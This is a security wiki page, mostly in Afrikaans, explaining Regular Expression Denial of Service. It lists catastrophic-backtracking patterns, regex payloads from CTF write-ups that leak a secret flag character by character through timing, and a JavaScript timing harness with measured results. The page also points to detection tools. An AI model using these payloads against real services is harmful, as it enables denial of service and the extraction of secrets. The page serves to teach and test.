Regular expression Denial of Service - ReDoS

Reading time: 4 minutes

Regular Expression Denial of Service (ReDoS)

'n Regular Expression Denial of Service (ReDoS) gebeur wanneer iemand voordeel trek uit swakhede in hoe regulêre uitdrukkings (n manier om patrone in teks te soek en te pas) werk. Soms, wanneer regulêre uitdrukkings gebruik word, kan hulle baie stadig raak, veral as die stuk teks waarmee hulle werk groter word. Hierdie traagheid kan so erg raak dat dit regtig vinnig groei met selfs klein verhogings in die teksgrootte. Aanvallers kan hierdie probleem gebruik om 'n program wat regulêre uitdrukkings gebruik, vir 'n lang tyd te laat ophou om behoorlik te werk.

The Problematic Regex Naïve Algorithm

Check the details in https://owasp.org/www-community/attacks/Regularexpression_Denial_of_Service-_ReDoS

Evil Regexes

'n Boosaardige regulêre uitdrukking patroon is daardie een wat kan vastloop op vervaardigde invoer wat 'n DoS veroorsaak. Boosaardige regex patrone bevat tipies groepe met herhaling en herhaling of alternasie met oorvleueling binne die herhaalde groep. Sommige voorbeelde van boosaardige patrone sluit in:

• (a+)+
• ([a-zA-Z]+)*
• (a|aa)+
• (a|a?)+
• (.*a){x} vir x > 10

Al hierdie is kwesbaar vir die invoer aaaaaaaaaaaaaaaaaaaaaaaa!.

ReDoS Payloads

String Exfiltration via ReDoS

In 'n CTF (of bug bounty) mag jy die Regex wat 'n sensitiewe inligting (die vlag) pas, beheer. Dan kan dit nuttig wees om die bladsy te laat vries (timeout of langer verwerkings tyd) as die Regex pas en nie as dit nie pas nie. Op hierdie manier sal jy in staat wees om die string karakter vir karakter te exfiltreer:

• In this post kan jy hierdie ReDoS reël vind: ^(?=<flag>)((.*)*)*salt$
• Voorbeeld: ^(?=HTB{sOmE_fl§N§)((.*)*)*salt$
• In this writeup kan jy hierdie een vind: <flag>(((((((.*)*)*)*)*)*)*)!
• In this writeup het hy gebruik: ^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

ReDoS Controlling Input and Regex

Die volgende is ReDoS voorbeelde waar jy beide die invoer en die regex beheer:

function check_time_regexp(regexp, text) {
var t0 = new Date().getTime()
new RegExp(regexp).test(text)
var t1 = new Date().getTime()
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
;[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$", //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach((regexp) => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

Gereedskap

• https://github.com/doyensec/regexploit
• https://devina.io/redos-checker

Verwysings

• https://owasp.org/www-community/attacks/Regularexpression_Denial_of_Service-_ReDoS
• https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets
• https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html
• https://ctftime.org/writeup/25869